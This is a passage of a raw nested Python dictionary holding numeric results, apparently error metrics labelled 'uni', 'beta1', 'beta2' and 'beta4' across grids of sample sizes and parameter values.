1.0209794959351524]}, 10: {'uni': 0.5993358090672234, 'beta1': 0.41112679093508553, 'beta2': 0.7547878772085324, 'beta4': [0.09227814617364233, 1.0145010250500368]}}, 400: {1000: {'uni': 0.025896757785848847, 'beta1': 0.002275505689533187, 'beta2': 0.26906265954395275, 'beta4': [0.005316252950804182, 1.1053525286504498]}, 750: {'uni': 0.030999475873056417, 'beta1': 0.0013746739567481712, 'beta2': 0.24465392626230614, 'beta4': [0.005176818412544991, 1.1019675368471202]}, 500: {'uni': 0.025622811417340657, 'beta1': 0.0019022171807471847, 'beta2': 0.24729224167591998, 'beta4': [0.005578228859751129, 1.1013403509292035]}, 400: {'uni': 0.029561442343993004, 'beta1': 0.002048023106808748, 'beta2': 0.27637565566664013, 'beta4': [0.004998616282624286, 1.0859532939934569]}, 300: {'uni': 0.03571761814634283, 'beta1': 0.002437177583227123, 'beta2': 0.2700165589811169, 'beta4': [0.007821456553393443, 1.0785300663455835]}, 200: {'uni': 0.05477353463547685, 'beta1': 0.007157574589887143, 'beta2': 0.36000438163781423, 'beta4': [0.009477632290181273, 1.0679008578747287]}, 150: {'uni': 0.07637914396289984, 'beta1': 0.008214072491315897, 'beta2': 0.3313508914969982, 'beta4': [0.010896098343519681, 1.0606215920525077]}, 100: {'uni': 0.11381210686532531, 'beta1': 0.018398479440258932, 'beta2': 0.3848114060260855, 'beta4': [0.01842792204189153, 1.0494021227638108]}, 75: {'uni': 0.13235635536736093, 'beta1': 0.0400207536216299, 'beta2': 0.43622251050409433, 'beta4': [0.02096042420956011, 1.0417337524508474]}, 50: {'uni': 0.20784298399859202, 'beta1': 0.07130540772043548, 'beta2': 0.5172134773734999, 'beta4': [0.031019984250849474, 1.0399235220946341]}, 30: {'uni': 0.2806740167803171, 'beta1': 0.11704543446506291, 'beta2': 0.5702527726239361, 'beta4': [0.04554425947712502, 1.0308498609198327]}, 20: {'uni': 0.40246892267081, 'beta1': 0.20410446629412546, 'beta2': 0.6441518759507474, 'beta4': [0.05556042308335842, 1.0232480248410107]}, 10: {'uni': 0.598029613692239, 'beta1': 0.3829637206480797, 'beta2': 0.764251193581595, 'beta4': [0.09040730486062148, 1.019159751691838]}}, 300: {1000: {'uni': 0.03927216885312887, 'beta1': 0.0028801095098431964, 'beta2': 0.24947150687424588, 'beta4': [0.006471187793034744, 1.160842602904632]}, 750: {'uni': 0.04444164944164811, 'beta1': 0.002888622051822249, 'beta2': 0.2592722580304042, 'beta4': [0.006201130494927228, 1.1590062388205389]}, 500: {'uni': 0.03386451243834725, 'beta1': 0.0038221572392608933, 'beta2': 0.27658117256322334, 'beta4': [0.006739074173776894, 1.1233561596091521]}, 400: {'uni': 0.04800908765953219, 'beta1': 0.003065738369982432, 'beta2': 0.28548162501904323, 'beta4': [0.00606252876571075, 1.108126781417158]}, 300: {'uni': 0.05760353656127645, 'beta1': 0.003795886776418645, 'beta2': 0.2863528848787791, 'beta4': [0.006410206857481998, 1.1008081595374801]}, 200: {'uni': 0.05530565353026629, 'beta1': 0.007022220375979206, 'beta2': 0.3218109561131835, 'beta4': [0.008012846276247196, 1.0851800676090981]}, 150: {'uni': 0.1015884659040974, 'beta1': 0.010932465278433428, 'beta2': 0.346711515967189, 'beta4': [0.01438935035588938, 1.0772279067151915]}, 100: {'uni': 0.10066039964522674, 'beta1': 0.019599157825161983, 'beta2': 0.3976221533440906, 'beta4': [0.016667365195821262, 1.0619499723924766]}, 75: {'uni': 0.13815160891461617, 'beta1': 0.03502822760481833, 'beta2': 0.4383232053771871, 'beta4': [0.020620270083654274, 1.0613801533703469]}, 50: {'uni': 0.2066489219754158, 'beta1': 0.06567958756880526, 'beta2': 0.4952136429816835, 'beta4': [0.030838115238396878, 1.0494382597763074]}, 30: {'uni': 0.3439260948693291, 'beta1': 0.1260781571060967, 'beta2': 0.5639845179676323, 'beta4': [0.043988630038169885, 1.0379761722153382]}, 20: {'uni': 0.373632536240914, 'beta1': 0.198641104511171, 'beta2': 0.6452030053501869, 'beta4': [0.05742329072620164, 1.0343631164659426]}, 10: {'uni': 0.5786272688848213, 'beta1': 0.38699506401815836, 'beta2': 0.7654074587403914, 'beta4': [0.09447939575707047, 1.0225736679875932]}}, 200: {1000: {'uni': 0.06593180893978717, 'beta1': 0.004952441169426624, 'beta2': 0.32211181174186826, 'beta4': [0.009731394920594555, 1.2036434242302154]}, 750: {'uni': 0.050050536074611546, 'beta1': 0.006136627342269299, 'beta2': 0.41164072649474215, 'beta4': [0.008362211620772572, 1.2102293050053385]}, 500: {'uni': 0.05148222892421142, 'beta1': 0.0044901273914807575, 'beta2': 0.3278867264985391, 'beta4': [0.010669013908256336, 1.19341818888688]}, 400: {'uni': 0.05311457852860502, 'beta1': 0.006855300638757073, 'beta2': 0.3051136005232666, 'beta4': [0.008864068572306396, 1.1940907811101498]}, 300: {'uni': 0.058569513810713326, 'beta1': 0.006359938814453158, 'beta2': 0.3510907562210193, 'beta4': [0.01035722486111736, 1.1576432677671158]}, 200: {'uni': 0.07231911900208032, 'beta1': 0.009541107607029078, 'beta2': 0.3406432710228655, 'beta4': [0.009895950553842075, 1.134981886136477]}, 150: {'uni': 0.06879337077817359, 'beta1': 0.00908941619076127, 'beta2': 0.3562401517641972, 'beta4': [0.012642116783133737, 1.126631367592092]}, 100: {'uni': 0.09847445660132435, 'beta1': 0.023351167906981215, 'beta2': 0.3702057371167343, 'beta4': [0.020174892176101, 1.1035884364086865]}, 75: {'uni': 0.13842215822110243, 'beta1': 0.040074923811621865, 'beta2': 0.4016290449749483, 'beta4': [0.025368667272077594, 1.0816686828715776]}, 50: {'uni': 0.2319732833555621, 'beta1': 0.058682815020592964, 'beta2': 0.449773155245931, 'beta4': [0.02730342261673676, 1.072599635960804]}, 30: {'uni': 0.3101271727138763, 'beta1': 0.12657777631872538, 'beta2': 0.5474897963622241, 'beta4': [0.051145369772815974, 1.0623736422151917]}, 20: {'uni': 0.3961402044589855, 'beta1': 0.19850885747842734, 'beta2': 0.6186209195012662, 'beta4': [0.05940991818827158, 1.0513644617190916]}, 10: {'uni': 0.5757986824828967, 'beta1': 0.40423129685515935, 'beta2': 0.7505415142571369, 'beta4': [0.09379731922689409, 1.039165679271243]}}, 150: {1000: {'uni': 0.06409389658307825, 'beta1': 0.009910476131101938, 'beta2': 0.3806517369874718, 'beta4': [0.017842367687703767, 1.273216215005103]}, 750: {'uni': 0.07885955543671457, 'beta1': 0.013763072632693718, 'beta2': 0.3644659021625199, 'beta4': [0.011918256361555676, 1.2636715858729746]}, 500: {'uni': 0.0782362103749921, 'beta1': 0.011063387421172906, 'beta2': 0.3492767192933155, 'beta4': [0.015527147770540454, 1.2388524034789448]}, 400: {'uni': 0.08206814173951552, 'beta1': 0.0105477079679912, 'beta2': 0.36894084845731795, 'beta4': [0.014908702122614857, 1.212354152577374]}, 300: {'uni': 0.07712147055703845, 'beta1': 0.013570500873764199, 'beta2': 0.3886339629626576, 'beta4': [0.01257341645320956, 1.1948059873364203]}, 200: {'uni': 0.07403838281349277, 'beta1': 0.014174956292383793, 'beta2': 0.3950286524652677, 'beta4': [0.011937421306978668, 1.1777024261360427]}, 150: {'uni': 0.08411412518651155, 'beta1': 0.012028423896870248, 'beta2': 0.3818541442194885, 'beta4': [0.01208166846307851, 1.1514427861414884]}, 100: {'uni': 0.10466099788702969, 'beta1': 0.021407915808379432, 'beta2': 0.536739509831108, 'beta4': [0.016639317502525126, 1.1213359880442546]}, 75: {'uni': 0.1639590772562653, 'beta1': 0.029456618460635874, 'beta2': 0.4241204047591904, 'beta4': [0.020685089221907236, 1.1220699258280653]}, 50: {'uni': 0.21195935570350966, 'beta1': 0.050872484133304474, 'beta2': 0.48434321428634336, 'beta4': [0.03329067097448155, 1.1042086282877204]}, 30: {'uni': 0.30021647417605113, 'beta1': 0.1596029309488946, 'beta2': 0.5716372430031915, 'beta4': [0.0499410592964029, 1.0773251535218258]}, 20: {'uni': 0.3949077922550226, 'beta1': 0.2117560147178309, 'beta2': 0.6654963464294259, 'beta4': [0.06269582775240698, 1.0662881676425546]}, 10: {'uni': 0.5789591056497254, 'beta1': 0.42152167320469863, 'beta2': 0.7554936621338648, 'beta4': [0.09424799097838252, 1.0533803023202404]}}, 100: {1000: {'uni': 0.1194156470953036, 'beta1': 0.01975867033885883, 'beta2': 0.38041630466120363, 'beta4': [0.024152237250705463, 1.4090426779720273]}, 750: {'uni': 0.1339598298370513, 'beta1': 0.02312816824466994, 'beta2': 0.36885145013242054, 'beta4': [0.01982726902974318, 1.3708518857235923]}, 500: {'uni': 0.1035033245625255, 'beta1': 0.020732864110625814, 'beta2': 0.45503343746867975, 'beta4': [0.018104556463916902, 1.3457075667383138]}, 400: {'uni': 0.13886200283191671, 'beta1': 0.033658545561272284, 'beta2': 0.4492892269062327, 'beta4': [0.018812997051150655, 1.3133090999063297]}, 300: {'uni': 0.1081039869660674, 'beta1': 0.025748028713259506, 'beta2': 0.4804479970623521, 'beta4': [0.019440969752786388, 1.3645100349536026]}, 200: {'uni': 0.10834338931329811, 'beta1': 0.025134994582497336, 'beta2': 0.44719795518594385, 'beta4': [0.01985586858794121, 1.271297008277481]}, 150: {'uni': 0.10712222517002118, 'beta1': 0.022613877946775662, 'beta2': 0.47758394504359103, 'beta4': [0.019572061091874843, 1.2574112506220025]}, 100: {'uni': 0.1668102455464986, 'beta1': 0.028918170904344648, 'beta2': 0.5875385470461234, 'beta4': [0.01921321761305392, 1.2005469273434903]}, 75: {'uni': 0.14135594283467587, 'beta1': 0.0414053687092711, 'beta2': 0.447284407621719, 'beta4': [0.02519589264892086, 1.1702958014284723]}, 50: {'uni': 0.17825851499059536, 'beta1': 0.0602645575613488, 'beta2': 0.5425738075050448, 'beta4': [0.0318471605346179, 1.1527026666904288]}, 30: {'uni': 0.31553458317183447, 'beta1': 0.11288833543480611, 'beta2': 0.5420894350287434, 'beta4': [0.04618637746422554, 1.1126856866808228]}, 20: {'uni': 0.40279034362262994, 'beta1': 0.2014111707304979, 'beta2': 0.5994182473676781, 'beta4': [0.06368202517740608, 1.1083190253440836]}, 10: {'uni': 0.5758568363154362, 'beta1': 0.37794937111554805, 'beta2': 0.7414226913600013, 'beta4': [0.10749142038604542, 1.078648425767379]}}, 75: {1000: {'uni': 0.15198660481824744, 'beta1': 0.036008431318779996, 'beta2': 0.4722224787708969, 'beta4': [0.027516412068499897, 1.534216828529965]}, 750: {'uni': 0.17208264399948853, 'beta1': 0.03909264011281362, 'beta2': 0.6400645338590032, 'beta4': [0.02340077871735158, 1.4753355323679431]}, 500: {'uni': 0.1680012490284888, 'beta1': 0.05632032512882802, 'beta2': 0.5903766149915854, 'beta4': [0.020364313693572396, 1.4541567750184143]}, 400: {'uni': 0.143726941597115, 'beta1': 0.05071904581785537, 'beta2': 0.4303060292771255, 'beta4': [0.03295149694207187, 1.399313576809266]}, 300: {'uni': 0.18177622688584122, 'beta1': 0.047176957786292203, 'beta2': 0.5493492545653206, 'beta4': [0.022838896555165238, 1.3583642788350967]}, 200: {'uni': 0.15601957161470076, 'beta1': 0.036011709792265006, 'beta2': 0.5731923214795615, 'beta4': [0.025949998185882228, 1.378321286217048]}, 150: {'uni': 0.13257484917386256, 'beta1': 0.04822774386024882, 'beta2': 0.5831931502945309, 'beta4': [0.032781898025316815, 1.3687382603624914]}, 100: {'uni': 0.17722038629436307, 'beta1': 0.042694795909128086, 'beta2': 0.6029512404969393, 'beta4': [0.029877309146450395, 1.2681586706189192]}, 75: {'uni': 0.15891757845874932, 'beta1': 0.05355874965931141, 'beta2': 0.5300785911451448, 'beta4': [0.024918571880254658, 1.249215328218056]}, 50: {'uni': 0.18061682437151294, 'beta1': 0.05778453530955624, 'beta2': 0.5259465500991863, 'beta4': [0.02589140629920943, 1.1870268806723268]}, 30: {'uni': 0.2932284826916738, 'beta1': 0.12331237733161636, 'beta2': 0.5673856570268109, 'beta4': [0.044505647902749156, 1.155359943383599]}, 20: {'uni': 0.4521356971815503, 'beta1': 0.18953667103215918, 'beta2': 0.610039387320265, 'beta4': [0.0582975169999248, 1.1287493981989316]}, 10: {'uni': 0.5902047893457638, 'beta1': 0.399006287470108, 'beta2': 0.7279029685166025, 'beta4': [0.09005082946454858, 1.1274449949615486]}}, 50: {1000: {'uni': 0.2592076419350719, 'beta1': 0.08467191522733127, 'beta2': 0.734314769066797, 'beta4': [0.04213219735340979, 1.7222471762357856]}, 750: {'uni': 0.22167472117269596, 'beta1': 0.09540608751728515, 'beta2': 0.6421055730602457, 'beta4': [0.0504857786224193, 1.7019362614923808]}, 500: {'uni': 0.24531208210966063, 'beta1': 0.10627289268903653, 'beta2': 0.6456700227453712, 'beta4': [0.037069614011306415, 1.5187817437439013]}, 400: {'uni': 0.23695230367792885, 'beta1': 0.1002348842240865, 'beta2': 0.6049088807842221, 'beta4': [0.037868788524990434, 1.7812259821193235]}, 300: {'uni': 0.23115353035249844, 'beta1': 0.09531354298937929, 'beta2': 0.6911305993958063, 'beta4': [0.04299005884233124, 1.6010012435025673]}, 200: {'uni': 0.281525317673935, 'beta1': 0.09540124922896594, 'beta2': 0.6097339897307856, 'beta4': [0.037532176774296495, 1.6532632152046558]}, 150: {'uni': 0.22683249774663827, 'beta1': 0.08442270699935141, 'beta2': 0.7320138430968691, 'beta4': [0.03990371983864124, 1.4661997548716317]}, 100: {'uni': 0.2430263267539406, 'beta1': 0.10006392357305124, 'beta2': 0.7821900964967258, 'beta4': [0.03933639350774809, 1.391655290350789]}, 75: {'uni': 0.276189771579198, 'beta1': 0.0887640194455103, 'beta2': 0.6129637162484526, 'beta4': [0.03756894113400522, 1.390111322107257]}, 50: {'uni': 0.29778921217600474, 'beta1': 0.08612400831717622, 'beta2': 0.666981830661031, 'beta4': [0.031164853582807427, 1.3358991647553666]}, 30: {'uni': 0.2724782219999575, 'beta1': 0.13307131181798842, 'beta2': 0.6442109151591487, 'beta4': [0.04036794068199744, 1.2563196523679523]}, 20: {'uni': 0.41797425695598467, 'beta1': 0.1882874604106344, 'beta2': 0.7691372650156472, 'beta4': [0.059432531917173244, 1.2208571964471882]}, 10: {'uni': 0.5534689290667542, 'beta1': 0.4309100389659457, 'beta2': 0.7401015027587745, 'beta4': [0.09902687359586748, 1.1629411926124198]}}, 30: {1000: {'uni': 0.42071315434786194, 'beta1': 0.3029377220718273, 'beta2': 0.812141471651635, 'beta4': [0.06650330678120728, 2.020979343996272]}, 750: {'uni': 0.4519278080535244, 'beta1': 0.23297010287113198, 'beta2': 1.2570282718489256, 'beta4': [0.08856354984151762, 1.900675005693711]}, 500: {'uni': 0.490379074291211, 'beta1': 0.22164571894561366, 'beta2': 1.1513628955563604, 'beta4': [0.06173029516131422, 2.106609476056458]}, 400: {'uni': 0.39408498283423027, 'beta1': 0.264918129333582, 'beta2': 0.8840846910050425, 'beta4': [0.05283404446603562, 2.029681875929849]}, 300: {'uni': 0.5427138663027202, 'beta1': 0.2379881723996197, 'beta2': 0.8363520498569965, 'beta4': [0.06281976632758741, 1.986886804942407]}, 200: {'uni': 0.41057068188367307, 'beta1': 0.21827805543776632, 'beta2': 0.9448279749895979, 'beta4': [0.07380808667104646, 1.82960910894638]}, 150: {'uni': 0.4803138989403234, 'beta1': 0.2391926745124124, 'beta2': 0.7949557568023287, 'beta4': [0.06065292517095262, 1.9106220557945983]}, 100: {'uni': 0.384454764576367, 'beta1': 0.21463268237662367, 'beta2': 1.0750644448071933, 'beta4': [0.05395328522325796, 1.6868737907037483]}, 75: {'uni': 0.37686548308814144, 'beta1': 0.1803066791969128, 'beta2': 0.8135615889320663, 'beta4': [0.05869896393842299, 1.758756502053507]}, 50: {'uni': 0.43171434803060726, 'beta1': 0.2505599625779312, 'beta2': 1.0757749691129281, 'beta4': [0.05273825248231705, 1.5564961938411799]}, 30: {'uni': 0.51976331390363, 'beta1': 0.2137422259138964, 'beta2': 0.9685059088900959, 'beta4': [0.05537585694294487, 1.492573272428689]}, 20: {'uni': 0.4398832977629888, 'beta1': 0.2038338719891519, 'beta2': 0.9093408387748209, 'beta4': [0.06105880798359843, 1.4158958005586584]}, 10: {'uni': 0.602699561740835, 'beta1': 0.4091942418408925, 'beta2': 1.0985411109097716, 'beta4': [0.09013494857283567, 1.2751619916727241]}}, 20: {1000: {'uni': 0.8863415930595386, 'beta1': 0.4124138906473128, 'beta2': 1.488915214895412, 'beta4': [0.09369684930943876, 2.5300474929166104]}, 750: {'uni': 0.6761163081220196, 'beta1': 0.6112111176414844, 'beta2': 1.1574051144435042, 'beta4': [0.09350064236361985, 2.4233068456250466]}, 500: {'uni': 0.7326156383642906, 'beta1': 0.45488960268311474, 'beta2': 1.0667140010754592, 'beta4': [0.08539132003116143, 2.392318747646077]}, 400: {'uni': 0.9458240653327108, 'beta1': 0.5132179115834019, 'beta2': 1.1170018019059054, 'beta4': [0.09756400190793793, 2.383853429295003]}, 300: {'uni': 0.6953482539627818, 'beta1': 0.37005811426083546, 'beta2': 1.3395766294720786, 'beta4': [0.10236241919596632, 2.2424866381905315]}, 200: {'uni': 0.6752386657747762, 'beta1': 0.5629563163345486, 'beta2': 1.5090274583586125, 'beta4': [0.09418806419964053, 2.137879622888132]}, 150: {'uni': 0.6578393936141584, 'beta1': 0.40103058328304875, 'beta2': 1.486585761364853, 'beta4': [0.09597951072128233, 2.4974862138426848]}, 100: {'uni': 0.9223237716292768, 'beta1': 0.526962313037276, 'beta2': 1.3422875156501894, 'beta4': [0.11187693983427766, 2.390782201823441]}, 75: {'uni': 0.9378358647715992, 'beta1': 0.7320432373178699, 'beta2': 1.428360070177185, 'beta4': [0.08107123212486303, 1.9900453884534253]}, 50: {'uni': 0.5886779763529189, 'beta1': 0.7434142787005832, 'beta2': 1.490335833898308, 'beta4': [0.0867226219932577, 1.7708768543057836]}, 30: {'uni': 0.7844811065280236, 'beta1': 0.674585828881643, 'beta2': 1.3416765903993606, 'beta4': [0.10083853135007012, 1.8020388082207972]}, 20: {'uni': 0.6068962998473377, 'beta1': 0.5722158961739197, 'beta2': 1.5402314826280434, 'beta4': [0.09978682190916095, 1.6786815060076368]}, 10: {'uni': 0.6137740105070696, 'beta1': 0.6013842817208861, 'beta2': 1.4032123539466417, 'beta4': [0.09596686888019154, 1.4364997057965616]}}, 10: {1000: {'uni': 2.5487977734820326, 'beta1': 3.093835089134801, 'beta2': 2.628311382488589, 'beta4': [0.17203346857254662, 4.565292216563792]}, 750: {'uni': 1.7304439175235797, 'beta1': 3.4056157251335355, 'beta2': 2.880595484342148, 'beta4': [0.166405967714536, 4.699029049816299]}, 500: {'uni': 2.3351084717688373, 'beta1': 4.452247264467255, 'beta2': 2.6188955235283458, 'beta4': [0.20056108653416985, 4.087275033325601]}, 400: {'uni': 2.731195017919183, 'beta1': 2.350880124717626, 'beta2': 2.856370147812412, 'beta4': [0.16295115167167193, 4.24552877727418]}, 300: {'uni': 2.6641281409091975, 'beta1': 2.1576795517926084, 'beta2': 2.5130859559443004, 'beta4': [0.16779978199870219, 3.868571825041176]}, 200: {'uni': 1.5900925503183005, 'beta1': 3.1409755807227073, 'beta2': 2.2138809993371926, 'beta4': [0.1593318444045239, 4.790452032349865]}, 150: {'uni': 1.6286417760707215, 'beta1': 2.75377845626076, 'beta2': 3.67929821312175, 'beta4': [0.17531673356231803, 4.449312838541493]}, 100: {'uni': 1.8811969967887474, 'beta1': 2.9356208183819876, 'beta2': 2.473884077752684, 'beta4': [0.1709344371346987, 3.647827690030222]}, 75: {'uni': 1.8560795641118366, 'beta1': 3.1515350543410756, 'beta2': 3.0880468571889907, 'beta4': [0.15535292216279414, 4.064998701862136]}, 50: {'uni': 1.8814827053991783, 'beta1': 2.374493146782945, 'beta2': 3.008522859298132, 'beta4': [0.18437354728017072, 3.38720140624215]}, 30: {'uni': 1.48455109714551, 'beta1': 1.9410442694643812, 'beta2': 2.623047438090551, 'beta4': [0.14962804639542013, 2.944732475701521]}, 20: {'uni': 2.2606118912147144, 'beta1': 2.857453424374173, 'beta2': 2.6002878870531627, 'beta4': [0.16364368010741698, 3.0232270039247746]}, 10: {'uni': 2.0419910091282496, 'beta1': 2.278659514136714, 'beta2': 4.444036437620339, 'beta4': [0.1414900750503085, 2.359580377512841]}}}, 0.25: {1000: {1000: {'uni': 0.013195418550431052, 'beta1': 0.00033599202159974306, 'beta2': 0.17875776570990679, 'beta4': [0.001842483224513699, 1.0501146695568533]}, 750: {'uni': 0.016013552511175373, 'beta1': 0.0007448601839703062, 'beta2': 0.1939607247455362, 'beta4': [0.0026832198909584985, 1.045851171150504]}, 500: {'uni': 0.028606084800545467, 'beta1': 0.0009990776069765802, 'beta2': 0.23019643865863643, 'beta4': [0.0039038637470758205, 1.0408378665938753]}, 400: {'uni': 0.026784771828518836, 'beta1': 0.0017503690452189602, 'beta2': 0.23880661743287537, 'beta4': [0.0044638088057132085, 1.0339823686261234]}, 300: {'uni': 0.044901759577933735, 'beta1': 0.003137529397079459, 'beta2': 0.28413102290789566, 'beta4': [0.00570921365480773, 1.0296508775897812]}, 200: {'uni': 0.06082540361236728, 'beta1': 0.0063974879798100875, 'beta2': 0.30606916955325597, 'beta4': [0.008520697454289822, 1.0269966675849775]}, 150: {'uni': 0.07655707515610163, 'beta1': 0.013948369547467494, 'beta2': 0.33861090522030257, 'beta4': [0.011996336066692004, 1.0232867029647827]}, 100: {'uni': 0.10338298270717705, 'beta1': 0.018877705317333838, 'beta2': 0.45060055459442544, 'beta4': [0.022990283509798048, 1.0179700562252552]}, 75: {'uni': 0.1396659034571349, 'beta1': 0.03581049481895991, 'beta2': 0.4434539695729213, 'beta4': [0.020437099800626753, 1.0153667391680519]}, 50: {'uni': 0.19106507905911785, 'beta1': 0.06485537073911667, 'beta2': 0.4863070473264254, 'beta4': [0.03218176626342667, 1.0137839199153011]}, 30: {'uni': 0.3267417047168397, 'beta1': 0.11404304917468981, 'beta2': 0.588828283618436, 'beta4': [0.04423747548783673, 1.0114786486125193]}, 20: {'uni': 0.38420849857792005, 'beta1': 0.193594506472965, 'beta2': 0.6372453314564789, 'beta4': [0.06361050423708928, 1.0091615128119644]}, 10: {'uni': 0.5693675845737495, 'beta1': 0.39041102697990016, 'beta2': 0.7566315490210422, 'beta4': [0.09008771114132266, 1.0069189003128556]}}, 750: {1000: {'uni': 0.015017581623422201, 'beta1': 0.0005229969093151775, 'beta2': 0.2203058886730741, 'beta4': [0.00279784709123115, 1.064456900017356]}, 750: {'uni': 0.016904201481230167, 'beta1': 0.0005338291902363273, 'beta2': 0.19340880740923883, 'beta4': [0.00261926497056331, 1.0579321298839985]}, 500: {'uni': 0.027943172620408567, 'beta1': 0.0015318638527157646, 'beta2': 0.25409206714489535, 'beta4': [0.003575838793613114, 1.0492278279222302]}, 400: {'uni': 0.03118864795904444, 'beta1': 0.0016085289162773252, 'beta2': 0.24158631574832493, 'beta4': [0.004570704595623831, 1.043307593616712]}, 300: {'uni': 0.03939923254929314, 'beta1': 0.002394440069879624, 'beta2': 0.27881013797398596, 'beta4': [0.008032996377590652, 1.0410106273195696]}, 200: {'uni': 0.051906798122560396, 'beta1': 0.006278530092671409, 'beta2': 0.30644670823465214, 'beta4': [0.008433048809803174, 1.0336123797928127]}, 150: {'uni': 0.07326600862954896, 'beta1': 0.008905435316224583, 'beta2': 0.37113421026799154, 'beta4': [0.014546850850626635, 1.0289169977314274]}, 100: {'uni': 0.11189329019372281, 'beta1': 0.019846735456416045, 'beta2': 0.39542365294265347, 'beta4': [0.018208296987618746, 1.025766689306411]}, 75: {'uni': 0.1678484331707909, 'beta1': 0.029574402442326134, 'beta2': 0.42874417776423157, 'beta4': [0.02055972472321407, 1.0234873870502206]}, 50: {'uni': 0.1952271332661482, 'beta1': 0.05132180284455529, 'beta2': 0.5101942514065345, 'beta4': [0.029538584572671573, 1.0205709311816702]}, 30: {'uni': 0.29549103341642446, 'beta1': 0.11375382235525358, 'beta2': 0.5774010134797688, 'beta4': [0.043397134001584924, 1.0149572928091315]}, 20: {'uni': 0.369054813439251, 'beta1': 0.18753690050721722, 'beta2': 0.6302442146655091, 'beta4': [0.05905591166068328, 1.0127070855268694]}, 10: {'uni': 0.5705723645153031, 'beta1': 0.33538869001095784, 'beta2': 0.7536693315538421, 'beta4': [0.09090966706285687, 1.0096300679209578]}}, 500: {1000: {'uni': 0.021889557244944267, 'beta1': 0.0016084377298841322, 'beta2': 0.22093243033409488, 'beta4': [0.0044242546343159885, 1.0942706517572218]}, 750: {'uni': 0.0282779819663743, 'beta1': 0.0010063238278199597, 'beta2': 0.22801622968391058, 'beta4': [0.003524960547103637, 1.0847550545283853]}, 500: {'uni': 0.02396940909943071, 'beta1': 0.0012467850959314592, 'beta2': 0.2403896865764518, 'beta4': [0.004622510648582559, 1.078998095038962]}, 400: {'uni': 0.029529299989594714, 'beta1': 0.0012555606744509623, 'beta2': 0.26866034442080555, 'beta4': [0.004369392231828045, 1.0635484692436274]}, 300: {'uni': 0.03991254665867394, 'beta1': 0.00255822522826619, 'beta2': 0.2642231017828307, 'beta4': [0.005987976762930624, 1.0603589784153802]}, 200: {'uni': 0.06061810982823111, 'beta1': 0.004931950447678618, 'beta2': 0.3192877286208291, 'beta4': [0.00779126287388132, 1.047823237900618]}, 150: {'uni': 0.08309549670478669, 'beta1': 0.00964244354795674, 'beta2': 0.34286215766481964, 'beta4': [0.01441652340985287, 1.0466346852282493]}, 100: {'uni': 0.10587341186654257, 'beta1': 0.01978694887441401, 'beta2': 0.39279220465296005, 'beta4': [0.018506230081135853, 1.0370421759695896]}, 75: {'uni': 0.13396967983613503, 'beta1': 0.028619271263970607, 'beta2': 0.4432603614897364, 'beta4': [0.027804200013461133, 1.0299777798090028]}, 50: {'uni': 0.21077312314667257, 'beta1': 0.05886988860232499, 'beta2': 0.46155116123085194, 'beta4': [0.03078387179932803, 1.0289576178335533]}, 30: {'uni': 0.3131438067304429, 'beta1': 0.11687966328016658, 'beta2': 0.5663680930743225, 'beta4': [0.04808898498893729, 1.0239674123992182]}, 20: {'uni': 0.3569885336276907, 'beta1': 0.1869604203182388, 'beta2': 0.5988532407417108, 'beta4': [0.05835834115870568, 1.0204858684172466]}, 10: {'uni': 0.5803490099111785, 'beta1': 0.36069945606514914, 'beta2': 0.7395010191228991, 'beta4': [0.08620087384471821, 1.013087530204457]}}, 400: {1000: {'uni': 0.026575918392955672, 'beta1': 0.002392815941304911, 'beta2': 0.24456541440243038, 'beta4': [0.004797919837938112, 1.1253811146360175]}, 750: {'uni': 0.02644965057420995, 'beta1': 0.002199022745448091, 'beta2': 0.24959821674028976, 'beta4': [0.004905034300258548, 1.104013219668593]}, 500: {'uni': 0.02959411665644158, 'beta1': 0.0016885572723923717, 'beta2': 0.24898911593101478, 'beta4': [0.004745438922447355, 1.088997665442233]}, 400: {'uni': 0.03502641320504352, 'beta1': 0.0016786943439029485, 'beta2': 0.2621921403404168, 'beta4': [0.004346224166041328, 1.0878846972621905]}, 300: {'uni': 0.04520325219647054, 'beta1': 0.0025501491440857887, 'beta2': 0.28592593421863094, 'beta4': [0.005324036219642212, 1.0691502375303021]}, 200: {'uni': 0.060109075263989446, 'beta1': 0.0052223884602183, 'beta2': 0.3125300226275192, 'beta4': [0.009280681826497663, 1.061558045261655]}, 150: {'uni': 0.07576829707995025, 'beta1': 0.007564903489288599, 'beta2': 0.3427799333015165, 'beta4': [0.011798396618607104, 1.0571740473117883]}, 100: {'uni': 0.11065680954182613, 'beta1': 0.01869098098454615, 'beta2': 0.4074253856786578, 'beta4': [0.015345065823318946, 1.0495661343336482]}, 75: {'uni': 0.12655190907350036, 'beta1': 0.03233447613785924, 'beta2': 0.4488100553399162, 'beta4': [0.024128531781180237, 1.0457037327331788]}, 50: {'uni': 0.17398297564543322, 'beta1': 0.05681149532603595, 'beta2': 0.4627537389486546, 'beta4': [0.030088173703089676, 1.036191980100532]}, 30: {'uni': 0.2783538553040459, 'beta1': 0.11152420121298304, 'beta2': 0.5659592579757353, 'beta4': [0.044256366871811184, 1.032758713111244]}, 20: {'uni': 0.40117304365295786, 'beta1': 0.2243708212441248, 'beta2': 0.6328241267767309, 'beta4': [0.05549991056298481, 1.0242052145141003]}, 10: {'uni': 0.5663957187651154, 'beta1': 0.367708243523239, 'beta2': 0.7561886475209632, 'beta4': [0.08503946611358437, 1.018904469921347]}}, 300: {1000: {'uni': 0.044566279105790474, 'beta1': 0.003327100530729034, 'beta2': 0.24078148356606432, 'beta4': [0.007288512460233923, 1.1407560034413293]}, 750: {'uni': 0.04277094007544684, 'beta1': 0.0021792994032752817, 'beta2': 0.3059000327593824, 'beta4': [0.006180875297249271, 1.1416369645421611]}, 500: {'uni': 0.035686740283980896, 'beta1': 0.0031967310027901977, 'beta2': 0.26516243628185904, 'beta4': [0.006373897578729658, 1.118051730471194]}, 400: {'uni': 0.03962556425612263, 'beta1': 0.00302236885935727, 'beta2': 0.28268247076294517, 'beta4': [0.006505476273152509, 1.1195062441426369]}, 300: {'uni': 0.03952239211713717, 'beta1': 0.002251421100688415, 'beta2': 0.2925527201127294, 'beta4': [0.00627083227986432, 1.0947897660301564]}, 200: {'uni': 0.05376346846673587, 'beta1': 0.0056129209261833535, 'beta2': 0.3045540431166837, 'beta4': [0.008073612074167416, 1.0780367857898463]}, 150: {'uni': 0.06707689863621345, 'beta1': 0.011476123926329301, 'beta2': 0.32317902238154983, 'beta4': [0.010910287838315519, 1.0784206140124115]}, 100: {'uni': 0.11377796787499908, 'beta1': 0.017237766709165093, 'beta2': 0.39768431902260115, 'beta4': [0.017631802606458878, 1.0682337278229384]}, 75: {'uni': 0.13894361913665587, 'beta1': 0.034186434799691474, 'beta2': 0.42306830656659034, 'beta4': [0.020660954120022272, 1.055028950778487]}, 50: {'uni': 